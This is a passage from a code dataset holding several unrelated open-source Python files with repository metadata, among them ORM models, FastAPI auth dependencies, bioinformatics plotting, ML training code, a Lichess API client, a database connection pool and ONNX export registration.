str(part2))\n","repo_name":"johnchoiniere/advent_of_code_2019","sub_path":"day_3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"22840479237","text":"# -*- coding: utf-8 -*-\nfrom tortoise import fields\nfrom tortoise.models import Model\n\n\nclass User(Model):\n    id = fields.BigIntField(pk=True)\n    username = fields.CharField(max_length=100, unique=True)\n    is_active = fields.BooleanField(default=True)\n    token = fields.UUIDField()\n    token_expiry = fields.DatetimeField(null=True)\n    created_at = fields.DatetimeField(auto_now_add=True)\n    updated_at = fields.DatetimeField(auto_now=True)\n\n    def __str__(self):\n        return f\"{self.username}\"\n","repo_name":"prefeitura-rio/chatbot-webhooks","sub_path":"chatbot_webhooks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}{"seq_id":"18534717331","text":"# utilities to help construction of complexes\n\nfrom topologylayer.functional.persistence import SimplicialComplex\nfrom itertools import combinations\nimport numpy as np\n\n\ndef unique_simplices(faces, dim):\n    \"\"\"\n    obtain unique simplices up to dimension dim from faces\n    \"\"\"\n    simplices = [[] for k in range(dim+1)]\n    # loop over faces\n    for face in faces:\n        # loop over dimension\n        for k in range(dim+1):\n            # loop over simplices\n            for s in combinations(face, k+1):\n                simplices[k].append(np.sort(list(s)))\n\n    s = SimplicialComplex()\n    # loop over dimension\n    for k in range(dim+1):\n        kcells = np.unique(simplices[k], axis=0)\n        for cell in kcells:\n            s.append(cell)\n\n    return s\n\n\ndef clique_complex(n, d):\n    \"\"\"\n    Create d-skeleton of clique complex on n vertices\n    \"\"\"\n    s = SimplicialComplex()\n    # loop over dimension\n    for k in range(d+1):\n        # loop over combinations\n        for cell in 
combinations(range(n), k+1):\n s.append(list(cell))\n return s\n","repo_name":"bruel-gabrielsson/TopologyLayer","sub_path":"topologylayer/util/construction.py","file_name":"construction.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":324,"dataset":"github-code","pt":"53"} +{"seq_id":"18561536694","text":"\"\"\"\nDependencies for the endpoints.\n\nThe goal is to create all dependencies using a Config class\nso that the app can be configured differently for testing and production.\n\"\"\"\nfrom typing import Optional\n\nimport rootski.services.database.dynamo.models as dynamo_models\nfrom fastapi import Depends, HTTPException, Request, Security\nfrom fastapi.security import HTTPAuthorizationCredentials, HTTPBearer\nfrom loguru import logger\nfrom rootski.config.config import ANON_USER\nfrom rootski.schemas import Services\nfrom rootski.services.database.dynamo.actions.user import UserNotFoundError, get_user, register_user\nfrom rootski.services.database.dynamo.db_service import DBService as DynamoDBService\nfrom rootski.services.database.dynamo.models2schemas.user import dynamo_to_pydantic__user\n\nfrom rootski import schemas\n\n################################\n# --- FastAPI Dependencies --- #\n################################\n\n\nasync def filter_valid_token(\n request: Request, credentials: HTTPAuthorizationCredentials = Security(HTTPBearer(auto_error=False))\n) -> Optional[str]:\n \"\"\"Return the token if it is valid, otherwise return None. None is taken to be the anon user.\"\"\"\n if credentials:\n token: str = credentials.credentials\n app_services: Services = request.app.state.services\n if not app_services.auth.token_is_valid(token):\n logger.error(f'Got malformed token \"{str(token)}\".')\n raise HTTPException(status_code=401, detail=\"Authorization token is invalid. See logs for details.\")\n return token\n return None\n\n\nasync def get_authorized_user_email_or_anon(request: Request, token: str = Depends(filter_valid_token)) -> str:\n \"\"\"\n :raises AuthServiceError: if the token is not wellformed\n \"\"\"\n app_services: Services = request.app.state.services\n if not token or token.strip() == \"\":\n return ANON_USER\n return app_services.auth.get_token_email(token)\n\n\nasync def get_current_user(\n request: Request, email: str = Depends(get_authorized_user_email_or_anon)\n) -> schemas.User:\n \"\"\"Retrieve the data of the current user from the database.\"\"\"\n\n services: Services = request.app.state.services\n dynamo: DynamoDBService = services.dynamo\n\n if email == ANON_USER:\n return schemas.User(email=ANON_USER, is_admin=False)\n\n # try to fetch the user's information in case they are already registered\n current_user_in_db: Optional[dynamo_models.User] = None\n try:\n current_user_in_db: dynamo_models.User = get_user(email=email, db=dynamo)\n except UserNotFoundError:\n ...\n\n # If the current user isn't registered, register them. 
They've only made\n    # it this far if they authenticated with cognito and have a signed JWT\n    # token with their email in it.\n    current_user: Optional[schemas.User] = None\n    if current_user_in_db:\n        current_user_dynamo_model: dynamo_models.User = get_user(email=email, db=dynamo)\n        current_user: schemas.User = dynamo_to_pydantic__user(dynamo_user=current_user_dynamo_model)\n    else:\n        register_user(email=email, is_admin=False, db=dynamo)\n        current_user = schemas.User(email=email, is_admin=False)\n\n    return current_user\n\n\n# def get_graphql_context(\n#     request: Request,\n#     db: Session = Depends(get_async_session),\n#     user: schemas.User = Depends(get_current_user),\n# ) -> RootskiGraphQLContext:\n#     \"\"\"Prepare the context object used by GraphQL resolvers.\"\"\"\n#     return RootskiGraphQLContext(\n#         request=request,\n#         session=db,\n#         user=user,\n#     )\n","repo_name":"rootski-io/rootski","sub_path":"rootski_api/src/rootski/main/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"}
+{"seq_id":"41564509482","text":"\"\"\"\nJoshua Arribere, March 30, 2020\n\nScript to make a heatmap of read length v number of reads.\n\nInput: inFile.jam - .jam file\n    readLengthLower, readLengthUpper - the shortest and longest\n        read lengths you wish to examine\n    startLeft, startRight, stopLeft, stopRight - how many\n        nts to look up/downstream of start/stop. For ex:\n        -10 50 -50 20 would be [-10,50], [-50,20]\n\nOutput: heatmap of reads per million\n\nrun as python metaStartStopHeatMap2.py inFile.jam 15 18 \n    -10 50 -50 20 outPrefix\n\"\"\"\nimport sys, seaborn, matplotlib.pyplot\nfrom logJosh import Tee\nimport pandas\n\ndef getPosition(txtList,index):\n    \"\"\"txtList is a list of txtInfo a la joshSAM. Will\n    loop through all the txts. If the index position of\n    the txts is all the same, then will return that\n    position. Else will return 'na'. Will also require\n    that all be Sense (not Antisense).\"\"\"\n    transcriptList = txtList.split('|')\n    positions=[entry.split(':')[index] for entry in transcriptList]\n    positions=map(int,positions)\n    positions=list(set(positions))\n    if len(positions)==1:\n        return positions[0]\n    return 'na'\n\ndef parseJoshSAMToDataFrame(inFile,\n    readLengthLower,readLengthUpper,\n    leftBound,rightBound,startOrStop):\n    \"\"\"inFile is a .jam file. Will look between\n    [leftBound,rightBound] relative to the startOrStop\n    (1 if start, 2 if stop).\n    Will initially add read counts for reads that\n    are unambiguously assignable to a position on a txt.\n    Then will normalize those to make rpm where m is million\n    unambiguously assignable reads\"\"\"\n    print('Restriction for uniquely mapping reads is on!')\n    #for the next line you need to use data=0. Using\n    #data=None initializes the df w/ NaN, which doesn't\n    #work w/ subsequent incrementation.\n    df=pandas.DataFrame(data=0,\n        index=range(readLengthLower,readLengthUpper+1),\n        columns=range(leftBound,rightBound+1))\n    cntr=0\n    with open(inFile,'r') as f:\n        ##skip the first line\n        next(f)\n        ##now do analyses\n        for line in f:\n            if not line.startswith('@'):\n                line=line.strip().split('\\t')\n                if len(line)>=10:\n                    position=getPosition(line[9],startOrStop)\n                    if position!='na' and line[8].endswith(':S'):\n                        readLength=len(line[6])\n                        if line[7]=='1:1' and line[3]=='-':\n                            if readLength in range(readLengthLower,\n                                readLengthUpper+1):\n                                cntr+=1\n                                if position in range(leftBound,\n                                    rightBound+1):\n                                    df.loc[readLength,position]+=1\n    #now normalize to make rpm\n    norm=float(cntr)/1000000.\n    for ii in range(readLengthLower,readLengthUpper+1):\n        for jj in range(leftBound,rightBound+1):\n            df.loc[ii,jj]/=norm\n    #return the DataFrame\n    return df\n\ndef mkHeatMaps(dfStart,dfStop,outPrefix):\n    \"\"\"Will plot the pair of dataframes dfStart and dfStop\n    next to one another in outPrefix file\"\"\"\n    #\n    fig,axs=matplotlib.pyplot.subplots(nrows=2,\n        ncols=1)\n    ##subplot titles\n    #axs[0].set_title('Position Relative Start Codon (nt)')\n    #axs[1].set_title('Position Relative Stop Codon (nt)')\n    #subplot of the start codon\n    seaborn.heatmap(dfStart,ax=axs[0],cmap=\"YlGnBu\",\n        square=True,\n        linewidths=.5,\n        cbar_kws={\"orientation\": \"horizontal\",\n            \"pad\": 0.35,\n            \"aspect\": 40,\n            \"label\": 'RPM'})\n    #subplot of the stop codon\n    seaborn.heatmap(dfStop,ax=axs[1],cmap=\"YlGnBu\",\n        square=True,\n        linewidths=.5,\n        cbar_kws={\"orientation\": \"horizontal\",\n            \"pad\": 0.35,\n            \"aspect\": 40,\n            \"label\": 'RPM'})\n    #\n    #add subplot axis labels\n    axs[0].set_xlabel('Position Relative Start Codon (nt)')\n    axs[1].set_xlabel('Position Relative Stop Codon (nt)')\n    axs[0].set_ylabel('Read Length (nt)')\n    axs[1].set_ylabel('Read Length (nt)')\n    #fig=axs.get_figure()\n    #write output\n    fig.savefig(f'{outPrefix}.png')\n    fig.savefig(f'{outPrefix}.svg')\n\ndef main(args):\n    #parse the in file\n    inFile=args[0]\n    #get the readLengths\n    readLengthLower,readLengthUpper=map(int,args[1:3])\n    #get the start/stop bounds\n    startLeft,startRight,stopLeft,stopRight=map(\n        int,args[3:7])\n    if startLeft>0 or stopLeft>0:\n        print(\"Head's up: if you want to look at positions \\\n            upstream of the start/stop codon, your \\\n            startLeft and stopLeft bounds need to be \\\n            negative. 
They currently are not.\")\n #now that we have those inputs, it should\n #be possible to make the heatmap\n dfStart=parseJoshSAMToDataFrame(inFile,\n readLengthLower,readLengthUpper,\n startLeft,startRight,1)\n dfStop=parseJoshSAMToDataFrame(inFile,\n readLengthLower,readLengthUpper,\n stopLeft,stopRight,2)\n #and grab the output file name\n outPrefix=args[7]\n #make the heatmap\n #mkHeatMaps(dfStart,dfStop,outPrefix)\n ##return the df instead of plotting it\n return dfStart,dfStop\n\nif __name__=='__main__':\n Tee()\n main(sys.argv[1:])\n","repo_name":"arriberelab/arriberelab","sub_path":"step1_pipelineScripts/metaStartStopHeatMap2.py","file_name":"metaStartStopHeatMap2.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18467136420","text":"import os\nimport tarfile\nfrom typing import Any, Dict, Sequence, Tuple, Union, cast\n\nimport torch\nimport torchvision\nfrom torch import nn\nfrom determined.pytorch import DataLoader, PyTorchTrial, reset_parameters\nfrom torchvision import models, transforms\nfrom tqdm import tqdm\n\n\nfrom data import CatDogDataset, get_test_transforms\nTorchData = Union[Dict[str, torch.Tensor], Sequence[torch.Tensor], torch.Tensor]\n\n\nclass CatDogModel(PyTorchTrial):\n def __init__(self, context):\n self.context = context\n self.data_dir = \"images/\"\n self.test_transform = get_test_transforms()\n\n def build_model(self) -> nn.Module:\n model = models.resnet50(pretrained=True)\n model.fc = nn.Linear(2048, 2)\n return model\n\n def optimizer(self, model: nn.Module) -> torch.optim.Optimizer: # type: ignore\n return torch.optim.SGD(model.parameters(),\n lr=float(self.context.get_hparam(\"learning_rate\")),\n momentum=0.9,\n weight_decay=float(self.context.get_hparam(\"weight_decay\")),\n nesterov=self.context.get_hparam(\"nesterov\"))\n\n def train_batch(\n self, batch: TorchData, model: nn.Module, epoch_idx: int, batch_idx: int\n ) -> Dict[str, torch.Tensor]:\n batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)\n data, labels = batch\n\n output = model(data)\n loss = torch.nn.functional.cross_entropy(output, labels)\n return {\"loss\": loss}\n\n def evaluate_batch(self, batch: TorchData, model: nn.Module) -> Dict[str, Any]:\n \"\"\"\n Calculate validation metrics for a batch and return them as a dictionary.\n This method is not necessary if the user overwrites evaluate_full_dataset().\n \"\"\"\n batch = cast(Tuple[torch.Tensor, torch.Tensor], batch)\n data, labels = batch\n\n output = model(data)\n pred = output.argmax(dim=1, keepdim=True)\n accuracy = pred.eq(labels.view_as(pred)).sum().item() / len(data)\n return {\"accuracy\": accuracy}\n\n def build_train_dataset(self):\n transform = transforms.Compose([\n transforms.Resize(240),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ])\n ds = CatDogDataset(self.data_dir, train=True, transform=transform)\n return ds\n\n def build_test_dataset(self):\n ds = CatDogDataset(self.data_dir, train=False, transform=self.test_transform)\n return ds\n\n def build_training_data_loader(self) -> Any:\n ds = self.build_train_dataset()\n return DataLoader(ds, batch_size=self.context.get_per_slot_batch_size())\n\n def build_validation_data_loader(self) -> Any:\n ds = self.build_test_dataset()\n return DataLoader(ds, 
batch_size=self.context.get_per_slot_batch_size())\n","repo_name":"determined-ai/works-with-determined","sub_path":"dvc/model_def.py","file_name":"model_def.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"}
+{"seq_id":"33514162623","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n\"\"\"\nThis module defines a simple CSV file writer.\n\"\"\"\n\nimport csv\n\n\ndef write_csv(file_object, rows, header=None, delimiter=','):\n    \"\"\"\n    Write the header and data to the specified file in CSV format.\n    NOTE: Special characters will be quoted.\n\n    @param file_object: Writable file object to which the CSV data is written.\n    @param header: Header row for CSV file.\n    @param rows: Data rows for CSV file.\n    \"\"\"\n    csvwriter = csv.writer(file_object, delimiter=delimiter, quoting=csv.QUOTE_MINIMAL)\n    if header is not None:\n        csvwriter.writerow(header)\n    csvwriter.writerows(rows)\n    return True\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edcore/edcore/utils/csv_writer.py","file_name":"csv_writer.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"5542883579","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : config.py\n@Time : 2023/01/13 16:19:42\n@Author : Huang zh\n@Contact : jacob.hzh@qq.com\n@Version : 0.1\n@Desc : None\n'''\n\nML_MODEL_NAME = ['lg', 'knn', 'dt', 'rf', 'gbdt', 'xgb', 'catboost', 'svm', 'bayes']\n\nDL_MODEL_NAME = ['lstm', 'cnn', 'transformer', 'capsules']\n\nPRE_MODEL_NAME = ['mac_bert', 'bert_wwm', 'bert', 'nezha_wwm', 'roberta_wwm']\n\nBATCH_SIZE = 8\n\nSPLIT_SIZE = 0.3\n\nIS_SAMPLE = True\n\nPIC_SAVED_PATH = './pic/' # directory where result pictures are saved\n\nVOCAB_MAX_SIZE = 100000 # maximum number of words in the vocabulary\n\nWORD_MIN_FREQ = 5 # minimum frequency for a word to be kept in the vocabulary\n\nVOCAB_SAVE_PATH = './data/vocab_dic.pkl' # where the vocabulary is stored\n\nL2I_SAVE_PATH = './data/label2id.pkl' # label-to-id mapping table\n\nPRETRAIN_EMBEDDING_FILE = './data/embed.txt'\n\nVERBOSE = 1 # print training results and test loss every 10 epochs\n\nMAX_SEQ_LEN = 100 # maximum allowed length of each text sample when using a pretrained model","repo_name":"hziheng/Machine-learning-project-for-text-classification","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
+{"seq_id":"19354473266","text":"import numpy as np\nimport pandas as pd\n\nclass brain_structure:\n    def __init__(self, input_file):\n        # Read table\n        MAXSIZE = 100\n        my_cols = [i for i in range(MAXSIZE)]\n        df = pd.read_csv(input_file, names=my_cols, engine='python',\n                         skiprows=[0],\n                         index_col=[1],\n                         skipinitialspace=True)\n        df = df.drop([0, 3, 4, 5, 6, 7, 8], axis=1)\n        for i in range(df.shape[0]):\n            for j in range(df.shape[1]):\n                if df.iloc[i, j] is None:\n                    df.iloc[i, j] = np.nan\n        df.columns = 
[\"Abbreviation\"] + [i for i in range(1, df.shape[1])]\n df_isnull = df.isnull()\n\n # Get levels of each row\n level = []\n description = []\n for i in range(len(df)):\n for j in range(1, df.shape[1]):\n if not df_isnull.iloc[i, j]:\n level.append(j)\n description.append(df.iloc[i, j])\n break\n MAXLEVEL = np.max(level)\n level = pd.DataFrame({'level': level, 'Abbreviation': df.Abbreviation.tolist(), 'Description': description},\n index=df.index)\n \n # Drop redundant columns\n df = df.iloc[:, :(MAXLEVEL + 2)] # The last column will contain only NaN\n df_isnull = df.isnull()\n\n # Fill empty slots in the table\n df_fill = df.copy()\n for i in range(1, df.shape[1]):\n cur_region = None\n for j in range(df.shape[0]):\n if not df_isnull.iloc[j, i]:\n cur_region = df.iloc[j, i]\n cur_level = level.loc[df.index[j], 'level']\n # print(j, cur_region, cur_level)\n elif (not cur_region is None) & (cur_level < level.loc[df.index[j], 'level']):\n df_fill.iloc[j, i] = cur_region\n\n self.input_file = input_file\n self.df = df_fill\n self.level = level\n self.selected_regions = self.df.index.tolist()\n self.dict_to_selected = {}\n for cur_region in self.selected_regions:\n child_ids = self.get_all_child_id(cur_region)\n for i in child_ids:\n self.dict_to_selected[i] = cur_region\n return\n\n def name_to_id(self, region_name):\n # region_name can be either Abbreviation (checked first) or description\n tp = self.level[self.level.Abbreviation == region_name]\n if len(tp) != 0:\n return tp.index[0]\n tp = self.level[self.level.Description == region_name]\n if len(tp) != 0:\n return tp.index[0]\n print(\"Cannot find any regions named %s.\" % region_name)\n return -1\n\n def get_all_child_id(self, structure_id):\n if type(structure_id) == str:\n structure_id = self.name_to_id(structure_id)\n cur_lvl = self.level.loc[structure_id]\n tp = self.df[self.df[cur_lvl.level]==cur_lvl['Description']]\n return tp.index.tolist()\n\n def get_selected_regions(self, input_file):\n brain_levels = pd.read_excel(input_file,\n usecols=[1, 2, 3, 5], index_col=0,\n names=['', 'Description', 'Abbreviation', 'level']\n )\n self.selected_regions = brain_levels.index.tolist()\n self.dict_to_selected = {}\n for cur_region in self.selected_regions:\n child_ids = self.get_all_child_id(cur_region)\n for i in child_ids:\n self.dict_to_selected[i] = cur_region\n return\n\n\n\n def id_to_name(self, region_ID):\n # region_name can be either Abbreviation (checked first) or description\n if region_ID in self.level.index.tolist():\n return self.level.loc[region_ID,'Abbreviation']\n else:\n print(\"Cannot find any regions with ID %s.\" % region_ID)\n \n\n\n\n\n","repo_name":"pengxie-bioinfo/neuro_morpho_toolbox","sub_path":"neuro_morpho_toolbox/brain_structure.py","file_name":"brain_structure.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"72008578408","text":"import json\nimport requests\n\n\nclass activity():\n def __init__(self, j):\n\n # interval\n content = [\"start\", \"end\"]\n for i in content:\n try:\n self.__dict__[\"interval_\"+i] = j[\"interval\"][i]\n except:\n self.__dict__[\"interval_\"+i] = None\n\n # games\n games_type = [\"chess960\",\n \"blitz\",\n \"crazyhouse\",\n \"antichess\",\n \"bullet\",\n \"correspondence\",\n \"atomic\",\n \"rapid\",\n \"classical\",\n \"racingKings\",\n \"horde\",\n \"ultraBullet\",\n \"threeCheck\",\n \"kingOfTheHill\"]\n content = [\"win\", \"loss\", \"draw\", \"rp\"]\n try:\n for i in 
j[\"games\"]:\n for t in games_type:\n for k in content:\n try:\n self.__dict__[\"games_\"+t+\"_\"+k] = \\\n j[\"games\"][t][k]\n except:\n self.__dict__[\"games_\"+t+\"_\"+k] = None\n\n except:\n for t in games_type:\n for k in content:\n self.__dict__[\"games_\"+t+\"_\"+k] = None\n\n # correspondenceMoves\n try:\n self.correspondence_nb = j[\"correspondenceMoves\"][\"nb\"]\n except:\n self.correspondence_nb = None\n\n self.correspondence_games = []\n try:\n for i in j[\"correspondenceMoves\"][\"games\"]:\n self.correspondence_games.append(i)\n\n except:\n pass\n\n # tournaments\n try:\n self.tournaments_nb = j[\"tournaments\"][\"nb\"]\n except:\n self.tournaments_nb = None\n\n self.tournaments_best = []\n try:\n for i in j[\"tournaments\"][\"best\"]:\n self.tournaments_best.append(i)\n except:\n pass\n\n # follows\n try:\n self.follows_nb = j[\"follows\"][\"in\"][\"nb\"]\n except:\n self.follows_nb = None\n\n self.follows = []\n try:\n for i in j[\"follows\"][\"in\"][\"ids\"]:\n self.follows.append(i)\n except:\n pass\n\n # puzzles\n content = [\"win\", \"loss\", \"draw\", \"rp\"]\n for i in content:\n try:\n self.__dict__[\"puzzles_\"+i] = j[\"puzzles\"][\"score\"][i]\n except:\n self.__dict__[\"puzzles_\"+i] = None\n\n # posts\n self.posts = []\n try:\n for i in j[\"posts\"]:\n self.posts.append(i)\n except:\n pass\n\n\ndef get_activity(us_name):\n url = \"https://lichess.org/api/user/{}/activity\".format(us_name)\n\n datajson = requests.get(url).text\n j = json.loads(datajson)\n\n act_list = []\n for i in j:\n act_list.append(activity(i))\n\n return act_list\n","repo_name":"Axeltherabbit/liapi","sub_path":"liapi/activityapi.py","file_name":"activityapi.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74452250087","text":"import psycopg2\nfrom psycopg2 import pool\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass ConnectionPool:\n _instance = None\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(ConnectionPool, cls).__new__(cls)\n cls._instance.initialize_connection_pool()\n return cls._instance\n\n return cls._instance\n\n def initialize_connection_pool(self):\n db_params = {\n 'database': os.getenv('DATABASE_NAME'),\n 'user': os.getenv('DATABASE_USER'),\n 'password': os.getenv('DATABASE_PASSWORD'),\n 'host': os.getenv('DATABASE_HOST'),\n 'port': os.getenv('DATABASE_PORT')\n }\n\n self.connection_pool = psycopg2.pool.SimpleConnectionPool(1, 5, **db_params)\n\n def get_connection(self):\n return self.connection_pool.getconn()\n\n def release_connection(self, connection):\n self.connection_pool.putconn(connection)\n\n\nif __name__ == '__main__':\n pool = ConnectionPool()\n conn1 = pool.get_connection()\n\n if conn1:\n print('Connection 1 acquired')\n cursor1 = conn1.cursor()\n cursor1.execute(\"SELECT * FROM movie_movie\")\n result = cursor1.fetchall()\n print(result)\n cursor1.close()\n pool.release_connection(conn1)\n\n conn2 = pool.get_connection()\n\n if conn2:\n print('Connection 2 acquired')\n cursor2 = conn2.cursor()\n cursor2.execute(\"SELECT * FROM user_review_userreview\")\n result = cursor2.fetchall()\n print(result)\n cursor2.close()\n pool.release_connection(conn2)\n\n\n","repo_name":"IshaqNiloy/design_patterns","sub_path":"singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"23070579146","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport os\r\nfrom turtle import *\r\n\r\nwin1 = tk.Tk()\r\nwin1.title('MY main') # 添加窗体名称\r\nwin1.geometry('670x470') # 设置窗体大小\r\n\r\n\r\ndef msgbox():\r\n color('red', 'yellow')\r\n\r\n begin_fill()\r\n while True:\r\n forward(200)\r\n left(170)\r\n if abs(pos()) < 1:\r\n break\r\n end_fill()\r\n done()\r\ndef he():\r\n os.system(\"C:\\Windows\\System32/mspaint.exe\")\r\n\r\nButton(win1, text=\"自动画太阳\", command=msgbox).pack()\r\nButton(win1, text=\"自己画\", command=he).pack()\r\n\r\nwin1.mainloop()\r\n","repo_name":"2011my/tools","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32222981393","text":"from recipe_engine import post_process\n\nPYTHON_VERSION_COMPATIBILITY = 'PY3'\n\nDEPS = [\n 'bot_update',\n 'gclient',\n 'recipe_engine/buildbucket',\n 'recipe_engine/cq',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\n\ndef RunSteps(api):\n src_cfg = api.gclient.make_config()\n soln = src_cfg.solutions.add()\n soln.name = 'src'\n soln.url = 'https://chromium.googlesource.com/chromium/src.git'\n try:\n bot_update_step = api.bot_update.ensure_checkout(\n patch=True, gclient_config=src_cfg)\n except api.step.StepFailure:\n api.step(\n name='cq will not retry this'\n if api.cq.do_not_retry_build else 'will retry',\n cmd=None)\n\n\ndef GenTests(api):\n\n yield (api.test('works as intended') + api.buildbucket.try_build(\n 'chromium/src',\n 'try',\n 'linux',\n git_repo='https://chromium.googlesource.com/chromium/src') +\n api.properties(fail_patch='apply') + api.step_data(\n 'bot_update', retcode=88) + api.post_check(\n lambda check, steps: check('cq will not retry this' in steps))\n + api.post_process(post_process.DropExpectation))\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/depot_tools/recipes/recipe_modules/bot_update/tests/do_not_retry_patch_failures_in_cq.py","file_name":"do_not_retry_patch_failures_in_cq.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"72271420647","text":"r\"\"\"Register quantized ops for ONNX.\nThis file registers a custom symbolic function\nfor exporting quantized models to ONNX.\n\"\"\"\nimport inspect\nimport warnings\nfrom numbers import Integral, Real\n\nimport changan_plugin_pytorch\nimport torch\nfrom torch.onnx import register_custom_op_symbolic\nfrom cap.utils.apply_func import flatten\n\n\ndef symbolic_quantized_op(\n g: torch._C.Graph, n: torch._C.Node, *args, **kwargs\n):\n r\"\"\"\n Register quantized ops for ONNX. 
This function will flatten List[Tensor]\n inputs and outputs to single Tensor because autograd function do not\n support List[Tensor] now.\n\n Note: Must be used with `script_quantized_fn` defined in\n script_quantized_fn.py\n \"\"\"\n\n # args format:\n # (\n # function name,\n # tuple of per list lengths of 'List[Tensor]' args in input args,\n # input args with flatten list inputs,\n # )\n # example:\n # origin args: func(Tensor, int, [Tensor1, Tensor2], int)\n # processed args: (func_name, 2, Tensor, int, Tensor1, Tensor2, int)\n fn_name, per_list_lens, *args = args\n\n if not isinstance(fn_name, str):\n return None\n\n module = None\n if \".\" in fn_name:\n # float op forward or segment_lut methods\n module_name, func_name = fn_name.split(\".\")\n # module is 'self' arg in forward function\n module, *args = args\n if func_name == \"forward\":\n func = getattr(\n changan_plugin_pytorch.nn, module_name, None\n ).forward\n fn_name = module_name # use module_name in onnx\n elif func_name in (\n \"_init_single_table_params\",\n \"_init_multi_table_params\",\n ):\n func = getattr(\n changan_plugin_pytorch.nn.quantized.SegmentLUT, func_name, None\n )\n else:\n raise ValueError(\"Unknown qualname {}\".format(fn_name))\n else:\n func = getattr(\n changan_plugin_pytorch.nn.quantized.functional, fn_name, None\n )\n if func is None:\n return None\n\n (\n arg_names,\n varargs,\n varkw,\n defaults,\n kwonlyargs,\n kwonlydefaults,\n annotations,\n ) = inspect.getfullargspec(func.__original_fn)\n # do not show 'self' arg in onnx\n arg_names = arg_names[1:] if module is not None else arg_names\n\n arg_idx_mapping = list(range(len(arg_names)))\n\n # list_of_tensor_arg_idx:\n # A list of List[Tensor] args indexes in func.\n # If no List[Tensor] args, will be []\n if func.list_of_tensor_arg_idx:\n # update idx to find args name in origin args\n list_arg_len_map = zip(\n reversed(func.list_of_tensor_arg_idx), reversed(per_list_lens)\n )\n for idx, list_len in list_arg_len_map:\n for _ in range(list_len - 1):\n arg_idx_mapping.insert(idx, idx)\n\n code = 'g.op(\"changan::{}\", '.format(fn_name)\n\n # put Tensor args in the front\n for i, arg in enumerate(args):\n if isinstance(arg, torch._C.Value):\n code += \"args[{}], \".format(i)\n\n type_to_reg_mapping = {\n Real: \"f\",\n Integral: \"i\",\n bool: \"i\",\n str: \"s\",\n torch.Tensor: \"t\",\n }\n\n def get_type(arg):\n if isinstance(arg, Integral):\n return Integral\n elif isinstance(arg, Real):\n return Real\n elif isinstance(arg, str): # for QuantDtype\n return str\n else:\n return type(arg)\n\n # process not Tensor args\n for i, arg in enumerate(args):\n reg_annt = type_to_reg_mapping.get(get_type(arg), None)\n # process list and tuple of (int, float, bool, s)\n if reg_annt is None:\n if isinstance(arg, (list, tuple)):\n reg_annt = type_to_reg_mapping.get(get_type(arg[0]), None)\n\n # Not support type arg(and arg is not None) will be converted to str\n if (\n arg is not None\n and reg_annt is None\n and not isinstance(arg, torch._C.Value)\n ):\n warnings.warn(\n \"FUNCTION '{}' ARG '{}' type is {}, \".format(\n fn_name, arg_names[arg_idx_mapping[i]], type(arg)\n )\n + \"which is not support in ONNX, will be converted to 'str'.\"\n )\n reg_annt = \"s\"\n args[i] = str(args[i])\n\n if reg_annt is not None:\n code += \"{}_{}=args[{}], \".format(\n arg_names[arg_idx_mapping[i]], reg_annt, i\n )\n\n output_nodes = list(n.outputs())\n\n code = code[:-2] + \", outputs={})\".format(len(output_nodes))\n\n if fn_name == 'AnchorGenerator':\n code = code[:-1] + 
